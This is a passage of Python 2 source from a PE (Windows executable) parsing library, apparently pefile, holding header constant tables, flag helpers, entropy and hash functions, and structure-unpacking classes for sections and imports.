('IMAGE_FILE_MACHINE_TRICORE', 0x0520),
('IMAGE_FILE_MACHINE_CEF', 0x0cef),
('IMAGE_FILE_MACHINE_EBC', 0x0ebc),
('IMAGE_FILE_MACHINE_AMD64', 0x8664),
('IMAGE_FILE_MACHINE_M32R', 0x9041),
('IMAGE_FILE_MACHINE_CEE', 0xc0ee),
]
MACHINE_TYPE = dict([(e[1], e[0]) for e in machine_types]+machine_types)
relocation_types = [
('IMAGE_REL_BASED_ABSOLUTE', 0),
('IMAGE_REL_BASED_HIGH', 1),
('IMAGE_REL_BASED_LOW', 2),
('IMAGE_REL_BASED_HIGHLOW', 3),
('IMAGE_REL_BASED_HIGHADJ', 4),
('IMAGE_REL_BASED_MIPS_JMPADDR', 5),
('IMAGE_REL_BASED_SECTION', 6),
('IMAGE_REL_BASED_REL', 7),
('IMAGE_REL_BASED_MIPS_JMPADDR16', 9),
('IMAGE_REL_BASED_IA64_IMM64', 9),
('IMAGE_REL_BASED_DIR64', 10),
('IMAGE_REL_BASED_HIGH3ADJ', 11) ]
RELOCATION_TYPE = dict([(e[1], e[0]) for e in relocation_types]+relocation_types)
dll_characteristics = [
('IMAGE_LIBRARY_PROCESS_INIT', 0x0001), # reserved
('IMAGE_LIBRARY_PROCESS_TERM', 0x0002), # reserved
('IMAGE_LIBRARY_THREAD_INIT', 0x0004), # reserved
('IMAGE_LIBRARY_THREAD_TERM', 0x0008), # reserved
('IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA', 0x0020),
('IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE', 0x0040),
('IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY', 0x0080),
('IMAGE_DLLCHARACTERISTICS_NX_COMPAT', 0x0100),
('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', 0x0200),
('IMAGE_DLLCHARACTERISTICS_NO_SEH', 0x0400),
('IMAGE_DLLCHARACTERISTICS_NO_BIND', 0x0800),
('IMAGE_DLLCHARACTERISTICS_APPCONTAINER', 0x1000),
('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', 0x2000),
('IMAGE_DLLCHARACTERISTICS_GUARD_CF', 0x4000),
('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', 0x8000) ]
DLL_CHARACTERISTICS = dict([(e[1], e[0]) for e in dll_characteristics]+dll_characteristics)
# Resource types
resource_type = [
('RT_CURSOR', 1),
('RT_BITMAP', 2),
('RT_ICON', 3),
('RT_MENU', 4),
('RT_DIALOG', 5),
('RT_STRING', 6),
('RT_FONTDIR', 7),
('RT_FONT', 8),
('RT_ACCELERATOR', 9),
('RT_RCDATA', 10),
('RT_MESSAGETABLE', 11),
('RT_GROUP_CURSOR', 12),
('RT_GROUP_ICON', 14),
('RT_VERSION', 16),
('RT_DLGINCLUDE', 17),
('RT_PLUGPLAY', 19),
('RT_VXD', 20),
('RT_ANICURSOR', 21),
('RT_ANIICON', 22),
('RT_HTML', 23),
('RT_MANIFEST', 24) ]
RESOURCE_TYPE = dict([(e[1], e[0]) for e in resource_type]+resource_type)
# Language definitions
lang = [
('LANG_NEUTRAL', 0x00),
('LANG_INVARIANT', 0x7f),
('LANG_AFRIKAANS', 0x36),
('LANG_ALBANIAN', 0x1c),
('LANG_ARABIC', 0x01),
('LANG_ARMENIAN', 0x2b),
('LANG_ASSAMESE', 0x4d),
('LANG_AZERI', 0x2c),
('LANG_BASQUE', 0x2d),
('LANG_BELARUSIAN', 0x23),
('LANG_BENGALI', 0x45),
('LANG_BULGARIAN', 0x02),
('LANG_CATALAN', 0x03),
('LANG_CHINESE', 0x04),
('LANG_CROATIAN', 0x1a),
('LANG_CZECH', 0x05),
('LANG_DANISH', 0x06),
('LANG_DIVEHI', 0x65),
('LANG_DUTCH', 0x13),
('LANG_ENGLISH', 0x09),
('LANG_ESTONIAN', 0x25),
('LANG_FAEROESE', 0x38),
('LANG_FARSI', 0x29),
('LANG_FINNISH', 0x0b),
('LANG_FRENCH', 0x0c),
('LANG_GALICIAN', 0x56),
('LANG_GEORGIAN', 0x37),
('LANG_GERMAN', 0x07),
('LANG_GREEK', 0x08),
('LANG_GUJARATI', 0x47),
('LANG_HEBREW', 0x0d),
('LANG_HINDI', 0x39),
('LANG_HUNGARIAN', 0x0e),
('LANG_ICELANDIC', 0x0f),
('LANG_INDONESIAN', 0x21),
('LANG_ITALIAN', 0x10),
('LANG_JAPANESE', 0x11),
('LANG_KANNADA', 0x4b),
('LANG_KASHMIRI', 0x60),
('LANG_KAZAK', 0x3f),
('LANG_KONKANI', 0x57),
('LANG_KOREAN', 0x12),
('LANG_KYRGYZ', 0x40),
('LANG_LATVIAN', 0x26),
('LANG_LITHUANIAN', 0x27),
('LANG_MACEDONIAN', 0x2f),
('LANG_MALAY', 0x3e),
('LANG_MALAYALAM', 0x4c),
('LANG_MANIPURI', 0x58),
('LANG_MARATHI', 0x4e),
('LANG_MONGOLIAN', 0x50),
('LANG_NEPALI', 0x61),
('LANG_NORWEGIAN', 0x14),
('LANG_ORIYA', 0x48),
('LANG_POLISH', 0x15),
('LANG_PORTUGUESE', 0x16),
('LANG_PUNJABI', 0x46),
('LANG_ROMANIAN', 0x18),
('LANG_RUSSIAN', 0x19),
('LANG_SANSKRIT', 0x4f),
('LANG_SERBIAN', 0x1a),
('LANG_SINDHI', 0x59),
('LANG_SLOVAK', 0x1b),
('LANG_SLOVENIAN', 0x24),
('LANG_SPANISH', 0x0a),
('LANG_SWAHILI', 0x41),
('LANG_SWEDISH', 0x1d),
('LANG_SYRIAC', 0x5a),
('LANG_TAMIL', 0x49),
('LANG_TATAR', 0x44),
('LANG_TELUGU', 0x4a),
('LANG_THAI', 0x1e),
('LANG_TURKISH', 0x1f),
('LANG_UKRAINIAN', 0x22),
('LANG_URDU', 0x20),
('LANG_UZBEK', 0x43),
('LANG_VIETNAMESE', 0x2a),
('LANG_GAELIC', 0x3c),
('LANG_MALTESE', 0x3a),
('LANG_MAORI', 0x28),
('LANG_RHAETO_ROMANCE',0x17),
('LANG_SAAMI', 0x3b),
('LANG_SORBIAN', 0x2e),
('LANG_SUTU', 0x30),
('LANG_TSONGA', 0x31),
('LANG_TSWANA', 0x32),
('LANG_VENDA', 0x33),
('LANG_XHOSA', 0x34),
('LANG_ZULU', 0x35),
('LANG_ESPERANTO', 0x8f),
('LANG_WALON', 0x90),
('LANG_CORNISH', 0x91),
('LANG_WELSH', 0x92),
('LANG_BRETON', 0x93) ]
LANG = dict(lang+[(e[1], e[0]) for e in lang])
# Sublanguage definitions
sublang = [
('SUBLANG_NEUTRAL', 0x00),
('SUBLANG_DEFAULT', 0x01),
('SUBLANG_SYS_DEFAULT', 0x02),
('SUBLANG_ARABIC_SAUDI_ARABIA', 0x01),
('SUBLANG_ARABIC_IRAQ', 0x02),
('SUBLANG_ARABIC_EGYPT', 0x03),
('SUBLANG_ARABIC_LIBYA', 0x04),
('SUBLANG_ARABIC_ALGERIA', 0x05),
('SUBLANG_ARABIC_MOROCCO', 0x06),
('SUBLANG_ARABIC_TUNISIA', 0x07),
('SUBLANG_ARABIC_OMAN', 0x08),
('SUBLANG_ARABIC_YEMEN', 0x09),
('SUBLANG_ARABIC_SYRIA', 0x0a),
('SUBLANG_ARABIC_JORDAN', 0x0b),
('SUBLANG_ARABIC_LEBANON', 0x0c),
('SUBLANG_ARABIC_KUWAIT', 0x0d),
('SUBLANG_ARABIC_UAE', 0x0e),
('SUBLANG_ARABIC_BAHRAIN', 0x0f),
('SUBLANG_ARABIC_QATAR', 0x10),
('SUBLANG_AZERI_LATIN', 0x01),
('SUBLANG_AZERI_CYRILLIC', 0x02),
('SUBLANG_CHINESE_TRADITIONAL', 0x01),
('SUBLANG_CHINESE_SIMPLIFIED', 0x02),
('SUBLANG_CHINESE_HONGKONG', 0x03),
('SUBLANG_CHINESE_SINGAPORE', 0x04),
('SUBLANG_CHINESE_MACAU', 0x05),
('SUBLANG_DUTCH', 0x01),
('SUBLANG_DUTCH_BELGIAN', 0x02),
('SUBLANG_ENGLISH_US', 0x01),
('SUBLANG_ENGLISH_UK', 0x02),
('SUBLANG_ENGLISH_AUS', 0x03),
('SUBLANG_ENGLISH_CAN', 0x04),
('SUBLANG_ENGLISH_NZ', 0x05),
('SUBLANG_ENGLISH_EIRE', 0x06),
('SUBLANG_ENGLISH_SOUTH_AFRICA', 0x07),
('SUBLANG_ENGLISH_JAMAICA', 0x08),
('SUBLANG_ENGLISH_CARIBBEAN', 0x09),
('SUBLANG_ENGLISH_BELIZE', 0x0a),
('SUBLANG_ENGLISH_TRINIDAD', 0x0b),
('SUBLANG_ENGLISH_ZIMBABWE', 0x0c),
('SUBLANG_ENGLISH_PHILIPPINES', 0x0d),
('SUBLANG_FRENCH', 0x01),
('SUBLANG_FRENCH_BELGIAN', 0x02),
('SUBLANG_FRENCH_CANADIAN', 0x03),
('SUBLANG_FRENCH_SWISS', 0x04),
('SUBLANG_FRENCH_LUXEMBOURG', 0x05),
('SUBLANG_FRENCH_MONACO', 0x06),
('SUBLANG_GERMAN', 0x01),
('SUBLANG_GERMAN_SWISS', 0x02),
('SUBLANG_GERMAN_AUSTRIAN', 0x03),
('SUBLANG_GERMAN_LUXEMBOURG', 0x04),
('SUBLANG_GERMAN_LIECHTENSTEIN', 0x05),
('SUBLANG_ITALIAN', 0x01),
('SUBLANG_ITALIAN_SWISS', 0x02),
('SUBLANG_KASHMIRI_SASIA', 0x02),
('SUBLANG_KASHMIRI_INDIA', 0x02),
('SUBLANG_KOREAN', 0x01),
('SUBLANG_LITHUANIAN', 0x01),
('SUBLANG_MALAY_MALAYSIA', 0x01),
('SUBLANG_MALAY_BRUNEI_DARUSSALAM', 0x02),
('SUBLANG_NEPALI_INDIA', 0x02),
('SUBLANG_NORWEGIAN_BOKMAL', 0x01),
('SUBLANG_NORWEGIAN_NYNORSK', 0x02),
('SUBLANG_PORTUGUESE', 0x02),
('SUBLANG_PORTUGUESE_BRAZILIAN', 0x01),
('SUBLANG_SERBIAN_LATIN', 0x02),
('SUBLANG_SERBIAN_CYRILLIC', 0x03),
('SUBLANG_SPANISH', 0x01),
('SUBLANG_SPANISH_MEXICAN', 0x02),
('SUBLANG_SPANISH_MODERN', 0x03),
('SUBLANG_SPANISH_GUATEMALA', 0x04),
('SUBLANG_SPANISH_COSTA_RICA', 0x05),
('SUBLANG_SPANISH_PANAMA', 0x06),
('SUBLANG_SPANISH_DOMINICAN_REPUBLIC', 0x07),
('SUBLANG_SPANISH_VENEZUELA', 0x08),
('SUBLANG_SPANISH_COLOMBIA', 0x09),
('SUBLANG_SPANISH_PERU', 0x0a),
('SUBLANG_SPANISH_ARGENTINA', 0x0b),
('SUBLANG_SPANISH_ECUADOR', 0x0c),
('SUBLANG_SPANISH_CHILE', 0x0d),
('SUBLANG_SPANISH_URUGUAY', 0x0e),
('SUBLANG_SPANISH_PARAGUAY', 0x0f),
('SUBLANG_SPANISH_BOLIVIA', 0x10),
('SUBLANG_SPANISH_EL_SALVADOR', 0x11),
('SUBLANG_SPANISH_HONDURAS', 0x12),
('SUBLANG_SPANISH_NICARAGUA', 0x13),
('SUBLANG_SPANISH_PUERTO_RICO', 0x14),
('SUBLANG_SWEDISH', 0x01),
('SUBLANG_SWEDISH_FINLAND', 0x02),
('SUBLANG_URDU_PAKISTAN', 0x01),
('SUBLANG_URDU_INDIA', 0x02),
('SUBLANG_UZBEK_LATIN', 0x01),
('SUBLANG_UZBEK_CYRILLIC', 0x02),
('SUBLANG_DUTCH_SURINAM', 0x03),
('SUBLANG_ROMANIAN', 0x01),
('SUBLANG_ROMANIAN_MOLDAVIA', 0x02),
('SUBLANG_RUSSIAN', 0x01),
('SUBLANG_RUSSIAN_MOLDAVIA', 0x02),
('SUBLANG_CROATIAN', 0x01),
('SUBLANG_LITHUANIAN_CLASSIC', 0x02),
('SUBLANG_GAELIC', 0x01),
('SUBLANG_GAELIC_SCOTTISH', 0x02),
('SUBLANG_GAELIC_MANX', 0x03) ]
SUBLANG = dict(sublang+[(e[1], e[0]) for e in sublang])
# Initialize the dictionary with all the name->value pairs
SUBLANG = dict( sublang )
# Now add all the value->name information, handling duplicates appropriately
for sublang_name, sublang_value in sublang:
if SUBLANG.has_key( sublang_value ):
SUBLANG[ sublang_value ].append( sublang_name )
else:
SUBLANG[ sublang_value ] = [ sublang_name ]
# Resolve a sublang name given the main lang name
#
def get_sublang_name_for_lang( lang_value, sublang_value ):
lang_name = LANG.get(lang_value, '*unknown*')
for sublang_name in SUBLANG.get(sublang_value, list()):
# if the main language is a substring of sublang's name, then
# return that
if lang_name in sublang_name:
return sublang_name
# otherwise return the first sublang name
return SUBLANG.get(sublang_value, ['*unknown*'])[0]
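# A minimal illustrative lookup using the tables above:
# get_sublang_name_for_lang(0x09, 0x01) resolves LANG[0x09] to 'LANG_ENGLISH' and
# returns 'SUBLANG_ENGLISH_US', the first name registered for sublang value 0x01
# that contains the main language name as a substring.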
# Ange Albertini's code to process resources' strings
#
def parse_strings(data, counter, l):
i = 0
error_count = 0
while i < len(data):
data_slice = data[i:i + 2]
if len(data_slice) < 2:
break
len_ = struct.unpack("<h", data_slice)[0]
i += 2
if len_ != 0 and 0 <= len_*2 <= len(data):
try:
l[counter] = data[i: i + len_ * 2].decode('utf-16')
except UnicodeDecodeError:
error_count += 1
pass
if error_count >= 3:
break
i += len_ * 2
counter += 1
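# Illustrative sketch of the layout handled above: resource string tables store
# UTF-16 strings prefixed by a 16-bit character count, so a buffer consisting of
# the length word 2 followed by the UTF-16 encoding of u'Hi' would add u'Hi' to
# the 'l' dictionary under the current counter value.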
def retrieve_flags(flag_dict, flag_filter):
"""Read the flags from a dictionary and return them in a usable form.
Will return a list of (flag, value) for all flags in "flag_dict"
matching the filter "flag_filter".
"""
return [(f[0], f[1]) for f in flag_dict.items() if
isinstance(f[0], str) and f[0].startswith(flag_filter)]
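# Example (illustrative): retrieve_flags(IMAGE_CHARACTERISTICS, 'IMAGE_FILE_')
# yields (name, value) pairs such as ('IMAGE_FILE_EXECUTABLE_IMAGE', 0x0002) and
# ('IMAGE_FILE_DLL', 0x2000), skipping the numeric keys of the two-way mapping.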
def set_flags(obj, flag_field, flags):
"""Will process the flags and set attributes in the object accordingly.
The object "obj" will gain attributes named after the flags provided in
"flags" and valued True/False, matching the results of applying each
flag value from "flags" to flag_field.
"""
for flag in flags:
if flag[1] & flag_field:
#setattr(obj, flag[0], True)
obj.__dict__[flag[0]] = True
else:
#setattr(obj, flag[0], False)
obj.__dict__[flag[0]] = False
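# Example (illustrative): with image_flags = retrieve_flags(IMAGE_CHARACTERISTICS,
# 'IMAGE_FILE_'), calling set_flags(obj, 0x2002, image_flags) sets
# obj.IMAGE_FILE_EXECUTABLE_IMAGE and obj.IMAGE_FILE_DLL to True and every other
# IMAGE_FILE_* attribute to False.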
def power_of_two(val):
return val != 0 and (val & (val-1)) == 0
FILE_ALIGNEMNT_HARDCODED_VALUE = 0x200
FileAlignment_Warning = False # We only want to print the warning once
SectionAlignment_Warning = False # We only want to print the warning once
class UnicodeStringWrapperPostProcessor:
"""This class attempts to help the process of identifying strings
that might be plain Unicode or Pascal. A list of strings will be
wrapped in it with the hope that the overlaps will help make the
decision about their type."""
def __init__(self, pe, rva_ptr):
self.pe = pe
self.rva_ptr = rva_ptr
self.string = None
def get_rva(self):
"""Get the RVA of the string."""
return self.rva_ptr
def __str__(self):
"""Return the escaped ASCII representation of the string."""
def convert_char(char):
if char in string.printable:
return char
else:
return r'\x%02x' % ord(char)
if self.string:
return ''.join([convert_char(c) for c in self.string])
return ''
def invalidate(self):
"""Make this instance None, to express it's no known string type."""
self = None
def render_pascal_16(self):
self.string = self.pe.get_string_u_at_rva(
self.rva_ptr+2,
max_length=self.get_pascal_16_length())
def ask_pascal_16(self, next_rva_ptr):
"""The next RVA is taken to be the one immediately following this one.
Such RVA could indicate the natural end of the string and will be checked
with the possible length contained in the first word.
"""
length = self.get_pascal_16_length()
if length == (next_rva_ptr - (self.rva_ptr+2)) / 2:
self.length = length
return True
return False
def get_pascal_16_length(self):
return self.__get_word_value_at_rva(self.rva_ptr)
def __get_word_value_at_rva(self, rva):
try:
data = self.pe.get_data(self.rva_ptr, 2)
except PEFormatError, e:
return False
if len(data)<2:
return False
return struct.unpack('<H', data)[0]
def ask_unicode_16(self, next_rva_ptr):
"""The next RVA is taken to be the one immediately following this one.
Such RVA could indicate the natural end of the string and will be checked
to see if there's a Unicode NULL character there.
"""
if self.__get_word_value_at_rva(next_rva_ptr-2) == 0:
self.length = next_rva_ptr - self.rva_ptr
return True
return False
def render_unicode_16(self):
""""""
self.string = self.pe.get_string_u_at_rva(self.rva_ptr)
class PEFormatError(Exception):
"""Generic PE format error exception."""
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class Dump:
"""Convenience class for dumping the PE information."""
def __init__(self):
self.text = list()
def add_lines(self, txt, indent=0):
"""Adds a list of lines.
The list can be indented with the optional argument 'indent'.
"""
for line in txt:
self.add_line(line, indent)
def add_line(self, txt, indent=0):
"""Adds a line.
The line can be indented with the optional argument 'indent'.
"""
self.add(txt+'\n', indent)
def add(self, txt, indent=0):
"""Adds some text, no newline will be appended.
The text can be indented with the optional argument 'indent'.
"""
if isinstance(txt, unicode):
try:
txt = str(txt)
except UnicodeEncodeError:
s = []
for c in txt:
try:
s.append(str(c))
except UnicodeEncodeError:
s.append(repr(c))
txt = ''.join(s)
self.text.append( ' '*indent + txt )
def add_header(self, txt):
"""Adds a header element."""
self.add_line('-'*10+txt+'-'*10+'\n')
def add_newline(self):
"""Adds a newline."""
self.text.append( '\n' )
def get_text(self):
"""Get the text in its current state."""
return ''.join( self.text )
STRUCT_SIZEOF_TYPES = {
'x': 1, 'c': 1, 'b': 1, 'B': 1,
'h': 2, 'H': 2,
'i': 4, 'I': 4, 'l': 4, 'L': 4, 'f': 4,
'q': 8, 'Q': 8, 'd': 8,
's': 1 }
class Structure:
"""Prepare structure object to extract members from data.
Format is a list containing definitions for the elements
of the structure.
"""
def __init__(self, format, name=None, file_offset=None):
# Format is forced little endian, for big endian non Intel platforms
self.__format__ = '<'
self.__keys__ = []
#self.values = {}
self.__format_length__ = 0
self.__field_offsets__ = dict()
self.__set_format__(format[1])
self.__all_zeroes__ = False
self.__unpacked_data_elms__ = None
self.__file_offset__ = file_offset
if name:
self.name = name
else:
self.name = format[0]
def __get_format__(self):
return self.__format__
def get_field_absolute_offset(self, field_name):
"""Return the offset within the field for the requested field in the structure."""
return self.__file_offset__ + self.__field_offsets__[field_name]
def get_field_relative_offset(self, field_name):
"""Return the offset within the structure for the requested field."""
return self.__field_offsets__[field_name]
def get_file_offset(self):
return self.__file_offset__
def set_file_offset(self, offset):
self.__file_offset__ = offset
def all_zeroes(self):
"""Returns true is the unpacked data is all zeros."""
return self.__all_zeroes__
def sizeof_type(self, t):
count = 1
_t = t
if t[0] in string.digits:
# extract the count
count = int( ''.join([d for d in t if d in string.digits]) )
_t = ''.join([d for d in t if d not in string.digits])
return STRUCT_SIZEOF_TYPES[_t] * count
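# Example (illustrative): sizeof_type('I') == 4, sizeof_type('H') == 2 and
# sizeof_type('8s') == 8, since a leading count multiplies the base type size.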
def __set_format__(self, format):
offset = 0
for elm in format:
if ',' in elm:
elm_type, elm_name = elm.split(',', 1)
self.__format__ += elm_type
elm_names = elm_name.split(',')
names = []
for elm_name in elm_names:
if elm_name in self.__keys__:
search_list = [x[:len(elm_name)] for x in self.__keys__]
occ_count = search_list.count(elm_name)
elm_name = elm_name+'_'+str(occ_count)
names.append(elm_name)
self.__field_offsets__[elm_name] = offset
offset += self.sizeof_type(elm_type)
# Some PE header structures have unions on them, so a certain
# value might have different names, so each key has a list of
# all the possible members referring to the data.
self.__keys__.append(names)
self.__format_length__ = struct.calcsize(self.__format__)
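# Example (illustrative): the section header format defined later in this module
# declares 'I,Misc,Misc_PhysicalAddress,Misc_VirtualSize', so one dword becomes
# readable through the union member names Misc, Misc_PhysicalAddress and
# Misc_VirtualSize, all sharing the same field offset.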
def sizeof(self):
"""Return size of the structure."""
return self.__format_length__
def __unpack__(self, data):
if len(data) > self.__format_length__:
data = data[:self.__format_length__]
# OC Patch:
# Some malware have incorrect header lengths.
# Fail gracefully if this occurs
# Buggy malware: a29b0118af8b7408444df81701adf
#
elif len(data) < self.__format_length__:
raise PEFormatError('Data length less than expected header length.')
if data.count(chr(0)) == len(data):
self.__all_zeroes__ = True
self.__unpacked_data_elms__ = struct.unpack(self.__format__, data)
for i in xrange(len(self.__unpacked_data_elms__)):
for key in self.__keys__[i]:
setattr(self, key, self.__unpacked_data_elms__[i])
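# Illustrative use of the unpacking machinery above (format tuple copied from the
# data directory definition later in this module):
# s = Structure(('IMAGE_DATA_DIRECTORY', ('I,VirtualAddress', 'I,Size')))
# s.__unpack__('\x00\x10\x00\x00\x80\x00\x00\x00')
# assert s.VirtualAddress == 0x1000 and s.Size == 0x80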
def __pack__(self):
new_values = []
for i in xrange(len(self.__unpacked_data_elms__)):
for key in self.__keys__[i]:
new_val = getattr(self, key)
old_val = self.__unpacked_data_elms__[i]
# In the case of Unions, when the first changed value
# is picked the loop is exited
if new_val != old_val:
break
new_values.append(new_val)
return struct.pack(self.__format__, *new_values)
def __str__(self):
return '\n'.join( self.dump() )
def __repr__(self):
return '<Structure: %s>' % (' '.join( [' '.join(s.split()) for s in self.dump()] ))
def dump(self, indentation=0):
"""Returns a string representation of the structure."""
dump = []
dump.append('[%s]' % self.name)
# Refer to the __set_format__ method for an explanation
# of the following construct.
for keys in self.__keys__:
for key in keys:
val = getattr(self, key)
if isinstance(val, int) or isinstance(val, long):
val_str = '0x%-8X' % (val)
if key == 'TimeDateStamp' or key == 'dwTimeStamp':
try:
val_str += ' [%s UTC]' % time.asctime(time.gmtime(val))
except exceptions.ValueError, e:
val_str += ' [INVALID TIME]'
else:
val_str = ''.join(filter(lambda c:c != '\0', str(val)))
dump.append('0x%-8X 0x%-3X %-30s %s' % (
self.__field_offsets__[key] + self.__file_offset__,
self.__field_offsets__[key], key+':', val_str))
return dump
def dump_dict(self):
"""Returns a dictionary representation of the structure."""
dump_dict = dict()
dump_dict['Structure'] = self.name
# Refer to the __set_format__ method for an explanation
# of the following construct.
for keys in self.__keys__:
for key in keys:
val = getattr(self, key)
if isinstance(val, int) or isinstance(val, long):
if key == 'TimeDateStamp' or key == 'dwTimeStamp':
try:
val = '0x%-8X [%s UTC]' % (val, time.asctime(time.gmtime(val)))
except exceptions.ValueError, e:
val = '0x%-8X [INVALID TIME]' % val
else:
val = ''.join(filter(lambda c:c != '\0', str(val)))
dump_dict[key] = {'FileOffset': self.__field_offsets__[key] + self.__file_offset__,
'Offset': self.__field_offsets__[key],
'Value': val}
return dump_dict
class SectionStructure(Structure):
"""Convenience section handling class."""
def __init__(self, *argl, **argd):
if 'pe' in argd:
self.pe = argd['pe']
del argd['pe']
Structure.__init__(self, *argl, **argd)
def get_data(self, start=None, length=None):
"""Get data chunk from a section.
Allows querying data from the section by passing the
addresses where the PE file would be loaded by default.
It is then possible to retrieve code and data by their real
addresses as they would appear once loaded.
"""
PointerToRawData_adj = self.pe.adjust_FileAlignment( self.PointerToRawData,
self.pe.OPTIONAL_HEADER.FileAlignment )
VirtualAddress_adj = self.pe.adjust_SectionAlignment( self.VirtualAddress,
self.pe.OPTIONAL_HEADER.SectionAlignment, self.pe.OPTIONAL_HEADER.FileAlignment )
if start is None:
offset = PointerToRawData_adj
else:
offset = ( start - VirtualAddress_adj ) + PointerToRawData_adj
if length is not None:
end = offset + length
else:
end = offset + self.SizeOfRawData
# PointerToRawData is not adjusted here as we might want to read any possible extra bytes
# that might get cut off by aligning the start (and hence cutting something off the end)
#
if end > self.PointerToRawData + self.SizeOfRawData:
end = self.PointerToRawData + self.SizeOfRawData
# print "offset : ",offset ,"end : ", end
return self.pe.__data__[offset:end]
def __setattr__(self, name, val):
if name == 'Characteristics':
section_flags = retrieve_flags(SECTION_CHARACTERISTICS, 'IMAGE_SCN_')
# Set the section's flags according to the Characteristics member
set_flags(self, val, section_flags)
elif 'IMAGE_SCN_' in name and hasattr(self, name):
if val:
self.__dict__['Characteristics'] |= SECTION_CHARACTERISTICS[name]
else:
self.__dict__['Characteristics'] ^= SECTION_CHARACTERISTICS[name]
self.__dict__[name] = val
def get_rva_from_offset(self, offset):
return (offset -
self.pe.adjust_FileAlignment(
self.PointerToRawData,
self.pe.OPTIONAL_HEADER.FileAlignment
) + self.pe.adjust_SectionAlignment(
self.VirtualAddress,
self.pe.OPTIONAL_HEADER.SectionAlignment,
self.pe.OPTIONAL_HEADER.FileAlignment )
)
def get_offset_from_rva(self, rva):
return (rva -
self.pe.adjust_SectionAlignment(
self.VirtualAddress,
self.pe.OPTIONAL_HEADER.SectionAlignment,
self.pe.OPTIONAL_HEADER.FileAlignment )
) + self.pe.adjust_FileAlignment(
self.PointerToRawData,
self.pe.OPTIONAL_HEADER.FileAlignment )
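# Worked example (illustrative, assuming the alignment adjustments return the
# values unchanged): for a section with VirtualAddress 0x1000 and PointerToRawData
# 0x400, get_offset_from_rva(0x1010) yields 0x410 and get_rva_from_offset(0x410)
# yields 0x1010.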
def contains_offset(self, offset):
"""Check whether the section contains the file offset provided."""
if self.PointerToRawData is None:
# bss and other sections containing only uninitialized data must have 0
# and do not take space in the file
return False
return ( self.pe.adjust_FileAlignment( self.PointerToRawData,
self.pe.OPTIONAL_HEADER.FileAlignment ) <=
offset <
self.pe.adjust_FileAlignment( self.PointerToRawData,
self.pe.OPTIONAL_HEADER.FileAlignment ) +
self.SizeOfRawData )
def contains_rva(self, rva):
"""Check whether the section contains the address provided."""
# Check if the SizeOfRawData is realistic. If it's bigger than the size of
# the whole PE file minus the start address of the section it could be
# either truncated or the SizeOfRawData contains a misleading value.
# In either of those cases we take the VirtualSize
#
if len(self.pe.__data__) - self.pe.adjust_FileAlignment( self.PointerToRawData,
self.pe.OPTIONAL_HEADER.FileAlignment ) < self.SizeOfRawData:
# PECOFF documentation v8 says:
# VirtualSize: The total size of the section when loaded into memory.
# If this value is greater than SizeOfRawData, the section is zero-padded.
# This field is valid only for executable images and should be set to zero
# for object files.
#
size = self.Misc_VirtualSize
else:
size = max(self.SizeOfRawData, self.Misc_VirtualSize)
VirtualAddress_adj = self.pe.adjust_SectionAlignment( self.VirtualAddress,
self.pe.OPTIONAL_HEADER.SectionAlignment, self.pe.OPTIONAL_HEADER.FileAlignment )
# Check whether there's any section after the current one that starts before the
# calculated end for the current one, if so, cut the current section's size
# to fit in the range up to where the next section starts.
if (self.next_section_virtual_address is not None and
self.next_section_virtual_address > self.VirtualAddress and
VirtualAddress_adj + size > self.next_section_virtual_address):
size = self.next_section_virtual_address - VirtualAddress_adj
return VirtualAddress_adj <= rva < VirtualAddress_adj + size
def contains(self, rva):
#print "DEPRECATION WARNING: you should use contains_rva() instead of contains()"
return self.contains_rva(rva)
def get_entropy(self):
"""Calculate and return the entropy for the section."""
return self.entropy_H( self.get_data() )
def get_hash_sha1(self):
"""Get the SHA-1 hex-digest of the section's data."""
if sha1 is not None:
return sha1( self.get_data() ).hexdigest()
def get_hash_sha256(self):
"""Get the SHA-256 hex-digest of the section's data."""
if sha256 is not None:
return sha256( self.get_data() ).hexdigest()
def get_hash_sha512(self):
"""Get the SHA-512 hex-digest of the section's data."""
if sha512 is not None:
return sha512( self.get_data() ).hexdigest()
def get_hash_md5(self):
"""Get the MD5 hex-digest of the section's data."""
if md5 is not None:
return md5( self.get_data() ).hexdigest()
def entropy_H(self, data):
"""Calculate the entropy of a chunk of data."""
if len(data) == 0:
return 0.0
occurences = array.array('L', [0]*256)
for x in data:
occurences[ord(x)] += 1
entropy = 0
for x in occurences:
if x:
p_x = float(x) / len(data)
entropy -= p_x*math.log(p_x, 2)
# print "p_x", p_x
return entropy
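# The returned value is the Shannon entropy in bits per byte: 0.0 for a buffer of
# identical bytes (e.g. entropy_H('\x00'*1024) == 0.0) up to 8.0 for uniformly
# distributed byte values; packed or encrypted sections tend towards the high end.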
class DataContainer(object):
"""Generic data container."""
def __init__(self, **args):
bare_setattr = super(DataContainer, self).__setattr__
for key, value in args.items():
bare_setattr(key, value)
class ImportDescData(DataContainer):
"""Holds import descriptor information.
dll: name of the imported DLL
imports: list of imported symbols (ImportData instances)
struct: IMAGE_IMPORT_DESCRIPTOR structure
"""
class ImportData(DataContainer):
"""Holds imported symbol's information.
ordinal: Ordinal of the symbol
name: Name of the symbol
bound: If the symbol is bound, this contains
the address.
"""
def __setattr__(self, name, val):
# If the instance doesn't yet have an ordinal attribute
# it's not fully initialized so can't do any of the
# following
#
if hasattr(self, 'ordinal') and hasattr(self, 'bound') and hasattr(self, 'name'):
if name == 'ordinal':
if self.pe.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE:
ordinal_flag = IMAGE_ORDINAL_FLAG
elif self.pe.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE_PLUS:
ordinal_flag = IMAGE_ORDINAL_FLAG64
# Set the ordinal and flag the entry as importing by ordinal
self.struct_table.Ordinal = ordinal_flag | (val & 0xffff)
self.struct_table.AddressOfData = self.struct_table.Ordinal
self.struct_table.Function = self.struct_table.Ordinal
self.struct_table.ForwarderString = self.struct_table.Ordinal
elif name == 'bound':
if self.struct_iat is not None:
self.struct_iat.AddressOfData = val
self.struct_iat.AddressOfData = self.struct_iat.AddressOfData
self.struct_iat.Function = self.struct_iat.AddressOfData
self.struct_iat.ForwarderString = self.struct_iat.AddressOfData
elif name == 'address':
self.struct_table.AddressOfData = val
self.struct_table.Ordinal = self.struct_table.AddressOfData
self.struct_table.Function = self.struct_table.AddressOfData
self.struct_table.ForwarderString = self.struct_table.AddressOfData
